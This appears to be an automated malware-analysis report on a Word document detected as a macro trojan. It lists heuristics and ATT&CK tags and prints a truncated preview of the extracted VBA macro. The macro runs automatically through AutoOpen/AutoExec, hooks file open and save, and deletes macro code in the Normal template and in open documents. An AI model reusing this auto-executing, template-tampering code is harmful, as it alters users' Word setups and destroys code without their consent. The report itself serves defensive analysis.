MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro includes AutoOpen and AutoExec functions, indicating it is designed to run automatically when the document is opened. ClamAV detections suggest it is a known trojan. The presence of AutoOpen and AutoExec macros strongly suggests this file was delivered as a spearphishing attachment.
Heuristics 4
-
ClamAV: Doc.Trojan.Opey-20 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Opey-20
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8064 bytes |
SHA-256: 7d53ec20554b899e2853e780afa26c4229a987e5a07bffa345ecd98e3cadd9c2 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "JiShenhua33"
' ------------------------------------------------------------------------------------
' 程序设计: 冀慎华 建行山东省分行
' 日期: 2001年3月
' 功能: 该程序把WORD菜单与工具条初始化到原来状态并删除本模块以外的宏模块.
'-------------------------------------------------------------------------------------
Const CurrentVersion = 33 '版本号
Const myName = "JiShenhua33" '本程序名
Sub AutoExec()
On Error Resume Next
Call Initialize
Call Immunize
End Sub
Sub AutoOpen()
On Error Resume Next
Call Initialize
Call Immunize
End Sub
Sub FileOpen()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileOpen).Show
Call Immunize
End Sub
Sub FileSave()
On Error Resume Next
Call Initialize
Call Immunize
If Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileSaveAs).Show
End Sub
Function IsNewDoc(myDoc As Document) As Boolean
Dim rightPart As String
If (Left(myDoc.Name, 2) = "文档") Then
rightPart = Right(myDoc.Name, Len(myDoc.Name) - 2)
If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
ElseIf (Left(myDoc.Name, 3) = "Doc") Then
rightPart = Right(myDoc.Name, Len(myDoc.Name) - 3)
If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
Else
IsNewDoc = False
End If
End Function
Function Immunize()
On Error Resume Next
Dim ModuleName$, OpenDocImmunized As Boolean
Dim i%, J%, NmImmunized As Boolean
Dim myInt As Integer
Dim openDoc As Document
NmImmunized = False
For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
ModuleName = NormalTemplate.VBProject.VBComponents(i).Name
Select Case ModuleName
Case "ThisDocument"
myInt = NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
If myInt > 0 Then
NormalTemplate.VBProject.VBComponents(i).CodeModule.DeleteLines 1, myInt
End If
Case "MyTools"
Case "VirusReport", "JiShenhua" '旧版本杀病毒程序
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, _
Name:=ModuleName, _
Object:=wdOrganizerObjectProjectItems
Case Else
If Left(ModuleName, 9) = "JiShenhua" Then '本程序
myInt = Val(Right(ModuleName, 2))
If myInt < CurrentVersion Then '当前程序的旧版本
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, _
Name:=ModuleName, _
Object:=wdOrganizerObjectProjectItems
Else
NmImmunized = True '是当前版本或更高版本程序
End If
Else '其他程序
msg = "你的 Word 系统中附带有宏程序模块 " + ModuleName + _
", 极有可能是宏病毒,请选择 '是' 清除该病毒."
If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, _
Name:=ModuleName, _
Object:=wdOrganizerObjectProjectItems
End If
End If
End Select
Next i
For Each openDoc In Documents
OpenDocImmunized = False
For J = openDoc.VBProject.VBComponents.Count To 1 Step -1
ModuleName = openDoc.VBProject.VBComponents(J).Name
Select Case ModuleName
Case "ThisDocument"
myInt = openDoc.VBProject.VBComponents(J).CodeModule.CountOfLines
If myInt > 0 Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.